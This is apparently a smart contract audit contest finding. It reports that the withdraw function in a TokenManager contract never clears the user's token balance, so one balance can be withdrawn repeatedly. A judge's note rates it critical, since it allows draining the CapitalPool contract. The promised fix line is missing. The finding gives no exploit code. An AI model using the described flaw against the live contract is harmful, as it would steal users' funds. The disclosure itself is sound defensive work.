The withdraw
function in the TokenManager
contract does not reset the userTokenBalanceMap
for the user after the claimed amount is withdrawn. This oversight can lead to potential multiple withdrawals if the balance is not updated correctly.
Contract: TokenManager
Function: withdraw
Location : https://github.com/tadle-com/market-evm/blob/8fbea7f4513cbeb0104236927d9051510574e673/src/core/TokenManager.sol#L137
Issue: The userTokenBalanceMap
is not reset to zero after a user withdraws their tokens. As a result, the same balance could potentially be withdrawn multiple times if the state is not properly updated.
This issue can lead to unintended behavior and security vulnerabilities, particularly if users can repeatedly withdraw the same balance. It can cause financial losses and compromise the integrity of the smart contract.
Manual code review
Add the following line in the withdraw
function to reset the user’s balance:
This ensures that the user’s balance is correctly updated after a withdrawal, preventing any possibility of multiple withdrawal.
Suggested Fix:
Valid critical severity finding, the lack of clearance of the `userTokenBalanceMap` mapping allows complete draining of the CapitalPool contract. Note: This would require the approval issues highlighted in other issues to be fixed first (i.e. wrong approval address within `_transfer` and lack of approvals within `_safe_transfer_from` during ERC20 withdrawals)
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.